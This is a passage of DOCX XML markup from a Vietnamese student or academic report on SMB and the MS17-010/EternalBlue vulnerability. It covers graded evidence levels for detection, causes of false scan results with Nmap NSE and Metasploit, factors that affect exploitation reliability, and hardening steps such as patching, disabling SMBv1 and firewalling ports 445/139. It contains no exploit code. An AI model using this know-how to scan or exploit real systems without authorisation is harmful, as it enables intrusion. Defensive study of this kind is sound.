        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="36BBF008" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Cấp độ 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="62F4242B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Xác nhận máy chủ chấp nhận SMBv1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4B1C677A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Server chấp thuận dialect </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>"NT LM 0.12"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> khi đàm phán Negotiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="1BBA95B4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tính năng SMBv1 chưa bị vô hiệu hóa; bề mặt phơi nhiễm của SMBv1 đang mở</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="600DE0D2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Chưa đủ cơ sở khẳng định có lỗ hổng.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Máy tính có thể đã được cài bản vá nhưng chưa tắt SMBv1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="2917782A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5BE0BC84" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấp độ 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="57ACF43C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Dấu hiệu phù hợp với hệ thống chưa vá MS17-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="21228B4C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Server phản hồi mã NT Status </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>STATUS_INSUFF_SERVER_RESOURCES</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>0xC0000205</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">) trước gói probe </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMB_COM_TRANSACTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4546B2DC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Driver </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>srv.sys</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> có nhánh xử lý logic trùng khớp với mẫu hành vi chưa được cập nhật bản vá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="44486A01" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Chưa chứng minh khai thác thành công.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Kết quả chỉ cho thấy phản hồi phù hợp với mẫu hành vi chưa vá; nếu truy cập nặc danh bị chặn và không có thông tin xác thực thì script không xác định được trạng thái</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="71106AA0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0469A7E5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấp độ 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="645ABE5A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Bằng chứng thực nghiệm cho thấy cấu hình có thể bị khai thác</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="08456B73" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phiên kiểm thử có kiểm soát hoàn tất việc thực thi mã thử nghiệm trong lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6A37CBB4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấu hình máy mục tiêu tồn tại lỗ hổng CVE-2017-0144 và có thể bị khai thác từ xa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="798EA9AE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Chỉ thực hiện trong mạng lab cô lập; dừng kiểm thử nếu phát sinh tác động ngoài dự kiến</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DD7640E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="6B261E29" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.4.2. Giới hạn kỹ thuật và phòng ngừa kết quả sai lệch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30600A20" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Trong quá trình trinh sát và kiểm tra an toàn dịch vụ SMB, kết quả ghi nhận từ các công cụ tự động có thể gặp hiện tượng dương tính giả (False Positive) hoặc âm tính giả (False Negative) do các nguyên nhân kỹ thuật:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F713195" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hạn chế của quyền truy cập nặc danh (Null Session):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kịch bản kiểm tra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>smb-vuln-ms17-010.nse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> khi không có thông tin xác thực sẽ phụ thuộc vào việc kết nối ẩn danh tới tài nguyên </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Nếu truy cập nặc danh tới </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bị chặn (như cấu hình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>RestrictAnonymous = 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) và người kiểm thử không cung cấp thông tin xác thực phù hợp, kịch bản có thể không hoàn tất được phép thăm dò và không xác định được trạng thái, dù driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trên thực tế có thể chưa được vá.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648817AA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tác động của thiết bị bảo vệ mạng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tường lửa cá nhân hoặc hệ thống ngăn ngừa xâm nhập (IPS) có tính năng DPI có thể cho phép bắt tay TCP ban đầu nhưng ngắt kết nối bằng gói TCP RST ngay khi xuất hiện bản tin Transaction dị thường, dẫn đến việc đánh giá sai lệch trạng thái dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5400BC62" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sự khác biệt giữa "Dấu hiệu chưa vá" và "Khả năng khai thác thành công":</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Một hệ thống được công cụ báo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>VULNERABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ở Cấp độ 3 chỉ phản ánh việc driver có phản ứng logic của mẫu hành vi cũ. Việc khai thác thực tế ở Cấp độ 4 còn chịu sự chi phối của kiến trúc CPU (x86 hay x64), mức độ phân mảnh của bộ nhớ Non-Paged Pool (dễ dẫn đến lỗi màn hình xanh BSOD thay vì thực thi shellcode ổn định), và sự ngăn chặn của các giải pháp bảo vệ điểm cuối (Endpoint Protection/EDR).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B47DD75" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Biện pháp phòng ngừa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Người kiểm thử cần đối chiếu kết quả Nmap/NSE và Metasploit scanner với phiên bản/build Windows, danh sách Hotfix/KB và trạng thái tính năng SMBv1 trên máy mục tiêu. Dữ liệu bắt gói tin (packet capture) và nhật ký sự kiện (Windows Event Logs) được sử dụng làm bằng chứng bổ sung khi cần phân tích nguyên nhân sai lệch [16], [17].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F07B3E2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.4.3. Nguyên tắc giảm thiểu rủi ro và phòng thủ giao thức SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CD1E5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Để bảo vệ hệ thống trước nguy cơ từ các lỗ hổng SMB và MS17-010, các nguyên tắc phòng thủ kỹ thuật cần được triển khai đồng bộ theo trình tự:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D3481" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cập nhật bản vá an ninh định kỳ (Security Patching):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B40B83" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cài đặt đầy đủ các bản vá an ninh do Microsoft phát hành theo danh mục ở Bảng 1.3 (ví dụ: gói KB4012212 hoặc các bản cập nhật tích lũy). Bản vá sửa đổi logic xử lý kích thước trong driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t>, khắc phục nguyên nhân của lỗi tràn bộ đệm mà không làm gián đoạn hoạt động chia sẻ tệp cần thiết [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062A617B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vô hiệu hóa giao thức SMBv1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA6AB3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do SMBv1 là giao thức legacy, tiềm ẩn nhiều khiếm khuyết kiến trúc và không hỗ trợ các tính năng an toàn hiện đại, khuyến nghị kỹ thuật là vô hiệu hóa tính năng này trên toàn bộ các máy trạm và máy chủ thông qua PowerShell, Group Policy (GPO) hoặc cài đặt Windows Features khi các ứng dụng không còn yêu cầu tương thích ngược [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C25A7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kiểm soát và lọc cổng TCP 445 / 139 bằng tường lửa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0D3C3A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình quy tắc tường lửa (Host Firewall và Network Firewall) để chặn kết nối tới cổng 445 và 139 từ các vùng mạng không tin cậy hoặc từ Internet. Dịch vụ chia sẻ tệp chỉ nên được phép truy cập từ các dải mạng nội bộ hoặc VLAN quản trị xác định [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC5EA0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Phân đoạn mạng và cô lập dịch vụ (Network Segmentation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C570D25" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tách biệt các máy chủ dữ liệu quan trọng vào các phân vùng mạng riêng, áp dụng danh sách kiểm soát truy cập (ACL) giữa các vùng mạng nhằm hạn chế khả năng lây lan ngang (Lateral Movement) nếu một trạm làm việc trong mạng bị xâm nhập [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0295E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Đánh giá ảnh hưởng tương thích:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055FEEB1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Trước khi vô hiệu hóa SMBv1 hoặc chặn cổng mạng trong môi trường thực tế, cần rà soát các thiết bị ngoại vi cũ (máy in mạng đời cũ, thiết bị lưu trữ NAS cũ) để có phương án nâng cấp hoặc chuyển tiếp phù hợp, tránh gây gián đoạn nghiệp vụ [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C54B35F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Quy trình kiểm thử lại (Retesting):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687230C1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi áp dụng biện pháp phòng thủ, chạy lại cùng bộ kiểm thử để ghi nhận sự thay đổi trạng thái tương ứng. Kết quả cần chứng minh không còn chỉ báo MS17-010 theo tiêu chí đã xác định, đồng thời ghi nhận riêng trạng thái cổng và phiên bản SMB sau cấu hình [17].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC555DE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TỔNG KẾT CHƯƠNG 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C2C38" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Chương 1 đã hệ thống hóa cơ sở lý thuyết về giao thức SMB, bản tin an ninh MS17-010 và các công cụ phục vụ công tác kiểm thử đánh giá an toàn thông tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B942E0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Trình bày tổng quan kiến trúc Client – Server của giao thức SMB trên hệ điều hành Windows, phân biệt đặc tính kỹ thuật giữa ba thế hệ SMBv1, SMBv2, SMBv3, làm rõ cơ chế hoạt động của cổng TCP 139 và TCP 445, cùng quy trình trao đổi bản tin cơ bản qua ba giai đoạn: Negotiate Protocol, Session Setup và Tree Connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C475FBE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Phân tích nhóm lỗ hổng trong bản tin an ninh MS17-010, xây dựng bảng đối chiếu 6 mã CVE và danh mục mã bản vá KB chính thức theo từng phiên bản hệ điều hành; làm rõ nguyên nhân kỹ thuật của lỗ hổng CVE-2017-0144 liên quan đến cấu trúc FEA trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
